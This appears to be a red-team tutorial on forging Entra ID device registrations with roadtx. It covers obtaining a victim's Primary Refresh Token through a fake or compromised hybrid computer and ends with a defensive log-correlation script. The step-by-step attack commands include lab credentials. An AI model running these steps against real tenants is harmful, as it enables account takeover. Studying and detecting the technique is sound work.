Token Requirements

ClientId | Resource
29d9ed98-a469-4536-ade2-f981bc1d605e | urn:ms-drs:enterpriseregistration.windows.net

Entra Joined

This means that the device does not exist in the on-prem setup. For example, you can join your laptop to Entra without having to join it to your on-prem Active Directory.

  1. Create and register the device.
roadtx device -a join -n DESKTOP-LAPJS2K

It should return key pairs for the device (.pem and .key files). The keys will later be used to request a Primary Refresh Token (PRT).

  2. Request a PRT with roadtx

Note

file indicates that we are using the previous refresh token of the victim user and a device registered under the same user.

roadtx prt --refresh-token file -c desktop-lapjs2k.pem -k desktop-lapjs2k.key

If all requirements are met and validated, roadtx should generate a .prt file (roadtx.prt). You can use the file with the browserprtauth module to browse seamlessly.

roadtx browserprtauth -url https://portal.azure.com

Hybrid Device

A hybrid device differs from an Entra joined device: it is an existing device joined to the on-prem Active Directory domain. This technique requires us to own an on-premises device, either by compromising a victim device or by creating a fake computer with the classic addcomputer.py.

  1. Create a fake computer with addcomputer.py
addcomputer.py cybernetics.ink/gordon:'P@$$w0rd!xyz' -dc-ip 10.66.66.7

  2. Apply certificates on the controlled computer account with setcert.py.
python3 setcert.py 10.66.66.7 -t 'DESKTOP-ATW2XQBF$' -u 'cybernetics.ink\DESKTOP-ATW2XQBF$' -p 'tuyfVZjfFGmkyKb8qM45NPSS9pyxdMAL'

  3. Join the device
roadtx device -a join -c DESKTOP-ATW2XQBF.pem -k DESKTOP-ATW2XQBF.key
  4. Request a PRT
roadtx prt --refresh-token file -c DESKTOP-ATW2XQBF.pem -k DESKTOP-ATW2XQBF.key
  5. Use roadtx’s browserprtauth to browse seamlessly.
roadtx browserprtauth -url https://portal.azure.com

Warning

If you receive an error saying that the Mozilla driver was not found, you can download the driver from here and specify the -d flag with the file path of the driver.
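
Steps 1 and 2 of the Hybrid Device procedure leave a trail in the domain controller's Security log: a computer account creation (event 4741) followed shortly by a certificate write on that same account (event 5136). The correlation below is an added example, not part of the original page or of roadtx; it assumes the certificate lands in the userCertificate attribute, and the event key names, the svc-provision and alice accounts, WS-0042, LAB-PC and all timestamps are constructed.

```python
from datetime import datetime, timedelta

# Constructed sample events, normalized from Windows Security log records.
# Key names are hypothetical; map them from your own log schema.
EVENTS = [
    {"id": 4741, "time": "2024-05-01T10:00:00", "actor": "gordon",
     "target": "DESKTOP-ATW2XQBF$"},
    {"id": 5136, "time": "2024-05-01T10:02:10", "actor": "DESKTOP-ATW2XQBF$",
     "object": "CN=DESKTOP-ATW2XQBF,CN=Computers,DC=cybernetics,DC=ink",
     "attribute": "userCertificate"},
    # Created by an allow-listed provisioning account: not reported.
    {"id": 4741, "time": "2024-05-01T11:00:00", "actor": "svc-provision",
     "target": "WS-0042$"},
    {"id": 5136, "time": "2024-05-01T11:05:00", "actor": "WS-0042$",
     "object": "CN=WS-0042,OU=Workstations,DC=cybernetics,DC=ink",
     "attribute": "userCertificate"},
    # Created by a user, but no certificate write follows: not reported.
    {"id": 4741, "time": "2024-05-01T12:00:00", "actor": "alice",
     "target": "LAB-PC$"},
]


def find_suspect_hybrid_joins(events, provisioning_accounts,
                              window=timedelta(hours=1)):
    """Report computer accounts created outside provisioning that get a
    userCertificate value written within `window` of their creation."""
    allowed = {a.lower() for a in provisioning_accounts}
    created = {}  # sAMAccountName (lowercase) -> (creator, creation time)
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4741 and ev["actor"].lower() not in allowed:
            created[ev["target"].lower()] = (ev["actor"], when)
        elif (ev["id"] == 5136
              and ev.get("attribute", "").lower() == "usercertificate"):
            # Assumption: the object's CN plus "$" is its sAMAccountName.
            cn = ev["object"].split(",", 1)[0].split("=", 1)[1]
            hit = created.get(cn.lower() + "$")
            if hit and when - hit[1] <= window:
                findings.append({
                    "computer": cn + "$", "created_by": hit[0],
                    "cert_written_by": ev["actor"],
                    "delay_seconds": int((when - hit[1]).total_seconds())})
    return findings


if __name__ == "__main__":
    for finding in find_suspect_hybrid_joins(EVENTS, {"svc-provision"}):
        print(finding)
```

Event 5136 is only logged when directory service change auditing is enabled and the computer objects carry a matching SACL, so confirm that coverage before relying on this correlation.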